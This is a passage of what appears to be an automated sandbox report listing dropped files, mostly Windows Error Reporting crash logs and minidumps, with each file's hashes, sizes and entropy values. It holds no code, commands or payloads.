                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25028
                                                                                                                                                                                                          Entropy (8bit):7.979863761752371
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:M44ak8nl3r9HtbRbXqbFSM4jjWk5rSV4Z8tPzh3XCV5:4JElb9HbqbF/SjWKW4S8P
                                                                                                                                                                                                          MD5:B0C0D7D2D7D47E1CF7C81686E7528C2D
                                                                                                                                                                                                          SHA1:8E89979DCC13A41C4E4946DB551FD4710DF16A21
                                                                                                                                                                                                          SHA-256:F9E8CC3B66EC027485AA71C95AC713354421D13A5425200C92550433C8301813
                                                                                                                                                                                                          SHA-512:5E92C8548C5799C244654937825388FFE11EDB15A193AED7DFD6672AF50177F8F7DB287B141F070D5388C2E071136E3E0BAADF3A9F7E4BE85A3773C3A8976314
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1094
                                                                                                                                                                                                          Entropy (8bit):7.841068276143127
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:IZsdS4WMBLdxezuQj1kZ8l9KfPqiHbjTPkTXRUubVPU:QsSixez1Rg8yxkTXRdNU
                                                                                                                                                                                                          MD5:E0C542CC0621197756ED46FDD1B95138
                                                                                                                                                                                                          SHA1:166275C7C4574EBB1B499525345F9FE0B68885D5
                                                                                                                                                                                                          SHA-256:1A47F6B4ECEA2E7343037EBB799EE811A2EB9770140F310A3CBE45FA2614E139
                                                                                                                                                                                                          SHA-512:2C0C7BAC3A828FA637D9434400790BDB1BA42913A66C0ADC3F8B42F48BD901B4FED8101AF914012248B75FAEEC5A301558C5E0107048FD460105A8F5B6731001
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                          Entropy (8bit):0.9472234476412374
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:Ee0Ae0Ii0BU/N0ZjRJduzuiFOZ24IO8q/:6AzIpBU/gjPczuiFOY4IO88
                                                                                                                                                                                                          MD5:DF8F9B4BA4764BE919B6D1FE0F2A5F39
                                                                                                                                                                                                          SHA1:64A30FD35949F2EE4C73B3EC72B84FBC886568E2
                                                                                                                                                                                                          SHA-256:883EFD03D5E955A10D9BB950375957867C8EE5584828F04DC94E76F39D009CDF
                                                                                                                                                                                                          SHA-512:EA66DE213AB2AEEA6AC2F1CC55C9B02D88F20F5137C0D2DF09F61785EDF92D1F3093B91CE6D0C89E398E529A0A02C9F2896CAB895D8A626D49DA4DC2A809B681
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.9.4.9.0.8.5.8.3.1.6.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.9.4.9.1.6.8.6.4.4.5.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.9.0.b.4.d.3.6.-.c.4.c.8.-.4.b.d.7.-.8.3.6.7.-.a.9.7.4.c.f.0.0.7.0.1.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.9.9.9.1.f.1.4.-.5.b.3.9.-.4.b.d.a.-.a.1.b.7.-.8.f.8.e.8.5.2.2.c.8.3.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.P.t.w.t.z.G.y.O.d.A.t.B...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.f.0.-.0.0.0.1.-.0.0.1.4.-.7.e.1.7.-.b.b.7.c.5.e.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.1.b.3.0.4.8.d.5.3.4.0.f.e.7.8.a.9.5.6.8.d.b.e.6.0.d.3.6.2.5.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.n.P.t.w.t.z.G.y.O.d.A.t.B...e.x.e.....T.a.r.
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                          Entropy (8bit):0.9469025824641436
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:vckEe0li0BU/N0ZjRJduzuiFOZ24IO8q/:VEzlpBU/gjPczuiFOY4IO88
                                                                                                                                                                                                          MD5:2856738848B0400993AA54EA8FB7AFAB
                                                                                                                                                                                                          SHA1:BB9C4A1AFE5D94301C82C42E7207A664D0A62CE3
                                                                                                                                                                                                          SHA-256:273C113666A11D15DE8E8381744974CEB7A280CF22CEB8125156A12D84E13FE6
                                                                                                                                                                                                          SHA-512:F28D457E955D8F8C47E2F21A0EB65279DBE0DA479D7E731F6C704894664C2C2304B398D7805FBF8F7EFD7CF7AB57B62BA83E4D2CC9C7B8AB0E82CD6E9E903DEE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.9.4.8.2.3.5.6.6.6.0.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.9.4.8.3.9.5.0.4.0.3.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.e.a.b.6.0.9.a.-.9.5.b.b.-.4.5.1.2.-.b.e.b.1.-.a.c.2.d.b.f.6.f.c.d.4.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.4.e.f.2.6.0.7.-.e.9.b.6.-.4.4.c.3.-.b.4.b.c.-.8.c.5.f.e.c.d.6.1.7.b.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.P.t.w.t.z.G.y.O.d.A.t.B...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.b.8.-.0.0.0.1.-.0.0.1.4.-.b.d.2.c.-.c.a.7.c.5.e.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.1.b.3.0.4.8.d.5.3.4.0.f.e.7.8.a.9.5.6.8.d.b.e.6.0.d.3.6.2.5.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.n.P.t.w.t.z.G.y.O.d.A.t.B...e.x.e.....T.a.r.
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                          Entropy (8bit):0.9472135266131183
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:jZe0G3i0BU/N0ZjRJduzuiFOZ24IO8q/A:9zG3pBU/gjPczuiFOY4IO88
                                                                                                                                                                                                          MD5:4BC7FFD8E28357BFD2B1BA24CD695EA0
                                                                                                                                                                                                          SHA1:2AD8F48A4140D4297F018BD4646D4C0917A06D33
                                                                                                                                                                                                          SHA-256:461968DDDE82EE8414F415F8DF94B643643894AC36E6AA6C3F7A8ABD96AA8136
                                                                                                                                                                                                          SHA-512:C33B64F1F0322DB2C170AF294A0AD20E353E695C106CB104F1C7A00E83C5D7FE6D340DF7224F8A7ADF58C3D8163AEE5C33A0803181BC591E4D98C5494644F1DF
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.9.4.9.2.6.7.2.9.8.2.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.9.4.9.5.9.0.7.3.6.2.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.5.3.0.1.b.c.d.-.c.6.7.c.-.4.e.e.3.-.9.5.6.6.-.e.1.5.b.7.1.1.2.f.9.e.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.e.1.a.0.b.6.8.-.b.b.5.b.-.4.f.8.d.-.a.d.9.0.-.8.8.1.3.8.8.e.d.e.a.6.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.P.t.w.t.z.G.y.O.d.A.t.B...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.d.8.-.0.0.0.1.-.0.0.1.4.-.b.f.6.8.-.b.9.7.c.5.e.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.1.b.3.0.4.8.d.5.3.4.0.f.e.7.8.a.9.5.6.8.d.b.e.6.0.d.3.6.2.5.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.n.P.t.w.t.z.G.y.O.d.A.t.B...e.x.e.....T.a.r.
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                          Entropy (8bit):0.9536346509424262
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:wjFe0Ri0BU/N0ZjRJdOzuiFOZ24IO8q/:cFzRpBU/gjPczuiFOY4IO88
                                                                                                                                                                                                          MD5:3DECFCF8D938B64D509951D3DAF2F64A
                                                                                                                                                                                                          SHA1:8B399040D9C7DB5731FAFDF64EA4A716F3AFDFFE
                                                                                                                                                                                                          SHA-256:AF841B97F1E4FF8FA52F32969F75A7E4AACCFACC360FE189DF7BA1AF571521A2
                                                                                                                                                                                                          SHA-512:D9772ABC9AED6BEB8D169C6AA8156200A1E267F7A9092EDB91E85FBA53708214BE5F7A0BAF8BC0BD0C68CE2841AB4FFD585D08EFADCE973E33DB1C4884FA5707
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.9.4.8.1.6.8.4.1.3.6.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.9.4.8.3.7.4.6.6.3.4.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.f.b.e.9.2.6.4.-.4.a.f.f.-.4.e.1.4.-.8.c.1.b.-.7.c.3.0.f.4.3.5.1.4.9.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.e.d.0.3.3.2.3.-.7.5.2.d.-.4.4.a.5.-.9.e.9.d.-.c.1.0.3.4.d.5.5.f.9.b.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.P.t.w.t.z.G.y.O.d.A.t.B...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.5.4.-.0.0.0.1.-.0.0.1.4.-.e.e.5.f.-.c.b.7.c.5.e.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.1.b.3.0.4.8.d.5.3.4.0.f.e.7.8.a.9.5.6.8.d.b.e.6.0.d.3.6.2.5.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.n.P.t.w.t.z.G.y.O.d.A.t.B...e.x.e.....T.a.r.
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                          Entropy (8bit):0.9533895994449075
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:gvke0Hi0BU/N0ZjRJdOzuiFnZ24IO8q/:rzHpBU/gjPczuiFnY4IO88
                                                                                                                                                                                                          MD5:F488AF9ADBC8DB680E5FD6A55E1A7701
                                                                                                                                                                                                          SHA1:8009A7CF93052CA0707012A749DC8B776FBD5F1B
                                                                                                                                                                                                          SHA-256:7C062EA5C7950912A99563464EB0A16F7336FEE928121E9A771E039CCDBCA112
                                                                                                                                                                                                          SHA-512:8756E2C69D9654ECF8D1F46B9FA5B87C157B64B40BBC60128F91DA73D9D60C9926196CB48731D910EB5335EEE43164DBD5B2310641DFFE3106DA2E68C1C52670
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.9.4.7.9.4.0.3.7.1.8.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.9.4.8.1.7.1.6.2.1.6.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.3.6.0.3.9.c.d.-.8.5.8.f.-.4.4.3.0.-.a.0.d.5.-.8.2.6.0.e.1.6.a.5.c.1.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.9.d.d.f.a.8.d.-.f.5.2.4.-.4.6.a.e.-.9.e.6.7.-.6.2.9.1.7.9.6.4.0.e.1.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.P.t.w.t.z.G.y.O.d.A.t.B...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.d.c.-.0.0.0.1.-.0.0.1.4.-.0.e.c.0.-.c.c.7.c.5.e.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.1.b.3.0.4.8.d.5.3.4.0.f.e.7.8.a.9.5.6.8.d.b.e.6.0.d.3.6.2.5.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.n.P.t.w.t.z.G.y.O.d.A.t.B...e.x.e.....T.a.r.
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                          Entropy (8bit):0.9538671670722524
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:mQqe0Qi0BU/N0ZjRJdOzuiFOZ24IO8q/:fqzQpBU/gjPczuiFOY4IO88
                                                                                                                                                                                                          MD5:D3AD688EC917E2B4E80EFD16BD3D4F3E
                                                                                                                                                                                                          SHA1:3D5C9FB98313C9CC4634430450720F0981CA9DDB
                                                                                                                                                                                                          SHA-256:14B6A95664399721A5551D7922503A5D34337FF1E2C8176F248AAA337E987442
                                                                                                                                                                                                          SHA-512:89FB77B7ACA57AA336E578F6B8856A2858D94C50C1BD99183FEA3F6DB80C88B7A6D3702BC740462FD7C51A4C69F21F788DA20D996828EFE475CB47176968EF54
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.9.4.7.9.1.2.0.4.5.2.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.9.4.8.1.7.1.4.2.0.1.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.9.6.d.1.0.2.4.-.2.7.9.9.-.4.3.2.8.-.9.4.5.7.-.6.3.c.0.c.1.1.1.2.f.5.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.8.f.b.8.9.5.d.-.5.e.5.b.-.4.1.5.f.-.b.d.c.5.-.1.c.0.c.2.3.0.7.8.a.b.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.P.t.w.t.z.G.y.O.d.A.t.B...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.d.0.-.0.0.0.1.-.0.0.1.4.-.c.3.1.7.-.c.f.7.c.5.e.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.1.b.3.0.4.8.d.5.3.4.0.f.e.7.8.a.9.5.6.8.d.b.e.6.0.d.3.6.2.5.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.n.P.t.w.t.z.G.y.O.d.A.t.B...e.x.e.....T.a.r.
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                          Entropy (8bit):0.9469302579266552
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:pvShPe0hi0BU/N0ZjRJduzuiFnZ24IO8q/:khPzhpBU/gjPczuiFnY4IO88
                                                                                                                                                                                                          MD5:596B949F9FCCF69AE474D0A58363EA21
                                                                                                                                                                                                          SHA1:80A70C4CE78497F6B967DBF906F8101C06EABCD1
                                                                                                                                                                                                          SHA-256:E28C3E8DE58ABF2B9090CAFDEF240D505709AE128B07ADD1152C755C739CCE13
                                                                                                                                                                                                          SHA-512:5ED1AA8E75FC88E5D3A7C0AB0A421EA1A121360F094ED54FD704466BD494935CD169BFE751FFBF3DC8D6353F695711F18C4BE9F997A1C9CE5BD51EA0CDE42AC1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.9.4.9.3.4.3.2.1.9.8.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.9.4.9.6.9.4.7.8.3.1.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.6.e.1.c.b.b.3.-.4.7.5.c.-.4.9.1.8.-.8.4.f.9.-.5.8.c.f.e.3.2.7.2.f.e.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.c.7.1.7.c.b.0.-.9.9.f.a.-.4.d.f.a.-.9.f.9.e.-.8.f.f.d.8.7.9.1.9.c.4.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.P.t.w.t.z.G.y.O.d.A.t.B...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.a.0.-.0.0.0.1.-.0.0.1.4.-.c.f.0.2.-.b.6.7.c.5.e.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.1.b.3.0.4.8.d.5.3.4.0.f.e.7.8.a.9.5.6.8.d.b.e.6.0.d.3.6.2.5.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.n.P.t.w.t.z.G.y.O.d.A.t.B...e.x.e.....T.a.r.
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:24:51 2024, 0x1205a4 type
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):96004
                                                                                                                                                                                                          Entropy (8bit):1.8338432458265894
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:43EQUWR7lOQUXbIKwl7gI/CbLSPOlvUT+Y+midT:wEQUixOQUX0Kw19/CbLSPOlDY+m
                                                                                                                                                                                                          MD5:A45A21516BCB1F608BD8ED3E0FD48A10
                                                                                                                                                                                                          SHA1:3D9E4984F4D4107E06A0A5EC730C30A0F2A49190
                                                                                                                                                                                                          SHA-256:645B4F4C82AA39A874B50538B32BA5BDB38F0C530B645EAA6C10282ED4256643
                                                                                                                                                                                                          SHA-512:CA1A4B3167B89DC6F4341711ECE6B5DFC69AF53D45851F5C61F26C46524C46ACA2FC7C1E6A584B2C3E37390200C391E45BBDD30353BA887735BA7535321077EF
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8366
                                                                                                                                                                                                          Entropy (8bit):3.7023007894350357
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:R6l7wVeJC56L6YSiSU9FEgmfmgprp89bissfQ2m:R6lXJ06L6Y3SU9mgmfmzi/fI
                                                                                                                                                                                                          MD5:678A9558D35918137F32BD9F44C86FE2
                                                                                                                                                                                                          SHA1:6E63D2C21A54AF0003EFF9C3883A14FF831C4323
                                                                                                                                                                                                          SHA-256:6238A6690E429761FF45EFAEB398189F509C97E66454F01677D086BAECFB1791
                                                                                                                                                                                                          SHA-512:51F86411560824DBBA5B6CBD051D9E67EE1A8E4A13F15E33FD5992748A46B40638CDB83CB34A649D3D5FE50DA16B4189ECCD3A872E0C97A7C9E8F7F51A95C8B5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>19045</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>....<Revision>2006</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>2057</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>2800</Pi
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4634
                                                                                                                                                                                                          Entropy (8bit):4.514987635641395
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:cvIwWl8zsgJg77aI98AAXWpW8VYOYm8M4JCKgwFEt+q8dg1SHvlvYd:uIjfmI72AAm7V6JCKWSEevlvYd
                                                                                                                                                                                                          MD5:7DF35B22AF9379863FDB73B03D717734
                                                                                                                                                                                                          SHA1:6EFECC56BC5E96E255F5EE8749926D3CA6B0CE70
                                                                                                                                                                                                          SHA-256:D5610AE34D2E21E1A3FA74A4AF87DC95AF835B34C6A36364D2D172E7F8F1752B
                                                                                                                                                                                                          SHA-512:2E66A7777E9AE2E2A5440505F5829488622A159BD3504AFDF48978A8C5B3F85BE67610C7DE4566C03E43AFF70182672D25BE11165F0D0B092C862019BE6778A7
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583707" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:24:52 2024, 0x1205a4 type
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):91280
                                                                                                                                                                                                          Entropy (8bit):1.875930303860812
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:xQUWRainOnpg30IyA4wgeoOnt7COW+4K5/CfI2Zo4asI/HvW:xQUiVnOpxIyAX3Pt7C1I/
                                                                                                                                                                                                          MD5:56110864785D5AE4EA5D8B7C531C55A4
                                                                                                                                                                                                          SHA1:10A151EEDA3C53885EE59E9ADFC948C4919866AA
                                                                                                                                                                                                          SHA-256:C68F5FFC58992E06A7C91B8285ABC35130949BB1A3127F3ED318B6134B419316
                                                                                                                                                                                                          SHA-512:4F8F30F465012B7CAA2F50A5A0CC93D75202684CEF1222C9BD332FCB1F12F58A795F53090CB2BCDA224DFD1A11D04CFD4348F68ECBCC655666DF03DA15DB9CD0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8366
                                                                                                                                                                                                          Entropy (8bit):3.706514763232686
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:R6l7wVeJc16B6YSGSU9/4gmfmgpru89bw9sfgQm:R6lXJ26B6YTSU9QgmfmSw2fu
                                                                                                                                                                                                          MD5:144C41009A3BF0BFE86F384E59501639
                                                                                                                                                                                                          SHA1:15E4C356B9DE7D8370C8B8EAD6843B7C48C20EB1
                                                                                                                                                                                                          SHA-256:5B8B9A6F945A9E3DD939AC984E76987499EAF1C795F6B7A9905CA27E465C0A4D
